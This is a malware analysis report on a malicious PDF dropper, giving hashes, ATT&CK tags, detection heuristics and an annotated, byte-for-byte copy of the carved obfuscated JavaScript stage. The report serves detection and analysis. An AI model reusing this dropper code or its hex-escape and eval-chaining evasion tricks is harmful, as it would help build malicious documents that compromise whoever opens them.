Malicious PDF — malware analysis report

Static analysis result for SHA-256 6d0d58da36271f83…

MALICIOUS

PDF

7.3 KB Authoring application: Tooqimeqipigafara (via d200dRenizaxizo) First seen: 2026-05-09
MD5: fdf6ef512481a40cbc78c3fd680e192f SHA-1: faf7b375be8b789f0c0454474db3e76c4002cd50 SHA-256: 6d0d58da36271f834e685a2e826ba798e2c01e9d6b7417a5bc1a1e58e3b14a67
106 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript, indicated by the 'PDF_OBFUSCATED_NAME_OBJECT' and 'PDF_JAVASCRIPT' heuristics. The ML classifier also flagged it as malicious. The script appears to be designed to download and execute a second-stage payload, as suggested by the variable names and string-concatenation patterns observed in the truncated script content. The obfuscation and the nature of the script strongly suggest malicious intent, most likely delivered as a spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9991

Heuristics 3

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x130D 2214 bytes
SHA-256: b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (added for this report; the carved script below is reproduced byte-for-byte).
// Stage 1 of a two-stage PDF dropper. The whole script sits in a single try/catch, so any
// failure is silent. The live logic is small: strip a noise alphabet out of the long string
// jOZ, rebuild the words "eval" and "prototype" by reversing split-up literals, then recurse
// until a counter exceeds 55 and call tEP.eval(jOZ), where tEP is the outer `this`
// (presumably the Acrobat Doc object — not verified here).
// With the noise class lSP = /[>8%U&#$~|!k9]/g removed, jOZ reads as plain Acrobat
// JavaScript that: reads every word of the current page via getPageNumWords/getPageNthWord
// and joins them; walks that text in 2-character chunks parsed as base 16; XORs each value
// with 2850; re-encodes the results as "\x.." escape text, padding 1-digit values; turns the
// text into bytes through app.eval('bMX="..."'); stores the last 332 characters in doc.xYN
// and the rest in doc.hSD; calls bYZ() (not defined in this script); and, from the catch
// that a failing bYZ() would reach, runs app.eval(doc.hSD). As written, a byte XOR 2850
// yields a 3-hex-digit value, so the "\x" reassembly only works if the page data is shaped
// accordingly — not verified here.
// No network or download API appears in the decoded text: the next stage is carried in the
// page's own text. Detection hooks visible from this sample: a hex-escaped /JavaScript name
// object (PDF_OBFUSCATED_NAME_OBJECT), getPageNthWord/getPageNumWords together with
// app.eval in one script, and a page whose words are runs of hex pairs.
var mXMB = null;try {var tIR=0;/* recursion counter start */function x(hSL){this.tEP=hSL;};/* x: wraps the object handed in (the outer `this`) as tEP */var jOZ=/* stage-2 source, padded with noise characters that lSP strips below */"va!r% #skX8GkX$=!t$h$i~sk.9t#E|P>;|r#=$\'kg!e9t$PUa$g!e#N$\'|;9b#QkZ|=%r$+|\'|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d|s|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 |285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'|\'U;$t|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V|=~\'!l%ekn!g8t$h|\'#;&z~G~L>S8=$\'%\\|\\$x%\'~;%l|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a|rks~e$I|n>t8\'|;&t9C9P|=!\'|f%r|o9m&C8h#a8r$Cko!dUe~\'~;~b9M|Z#=k\'~ckhUa|rkC#o9d#e$A#t8\'9;%q|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'|d|o|c~\'9;&v9I$X!=#3&3!2|;%x&G#Fk=k[#]U;|bkM8Xk=|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X|[|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V|=~t9I9R|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G|V~,&t&r#u%e%)%;~j~OUB>=|[|j&O>B$,UbkS|N!]>[#x%I>D%]|(!rUQkH!)~;&;9}$f|o&r~(%j!GkV&=%08;Uj#G!V! |<> ~j|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{|s9T|C&L!=!j~O#B%[|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r&E~F>=8p|a9r%s!e~I|n8t~(8s!T$C&L9,8f>G9L#)!;kf$I>H|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W|RU[|x%M$V9]%=9=#q!F>M|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 
8S#t8r!iUn9g|($z%GUL~S# >+$ 8x9G|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;|s|XkG$XU.>x#Y%N!=U(>b9M9X8[|z>A$T>]!(~b|M|X>[!x>MUVk]8-~v|I#X$)9)%;|sUX!G%X|.$h8SUD|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(|)#;!}# %c8a!t!cUh8(>n&M~H$)~{|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ |{~a9p!p|[%n#A%B~]|(ks%X>G&X&.|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;/* 55: the counter must exceed this before the eval fires */var v=this;/* outer `this`, handed to x() as tEP */var qFMN=2-1;/* recursion step of 1 */var lSP=/[\>8%U&#\$~\|\!k9]/g;/* noise alphabet interleaved into jOZ */function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}/* zAL: reverses a string (charAt(length) yields '' and is harmless) */var tGB=new String("Fun"+"cti"+"on");/* "Function" — assigned but never used below */var xMV="len"+"gth";/* "length" — unused here; the decoded stage defines its own xMV */;jOZ=jOZ.replace(lSP, '');/* de-noise: jOZ is now readable stage-2 source */nAB=zAL(String("lav"+"e"));/* "eval" */nEX=zAL("epyt"+"otor"+"p");/* "prototype" */;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};/* x.prototype.fOF: recurse until jQT > 55, then tEP.eval(jOZ) */var mXMB=new x(v);mXMB.fOF(tIR);/* start the countdown at 0 */} catch(bMX){}/* every error is swallowed */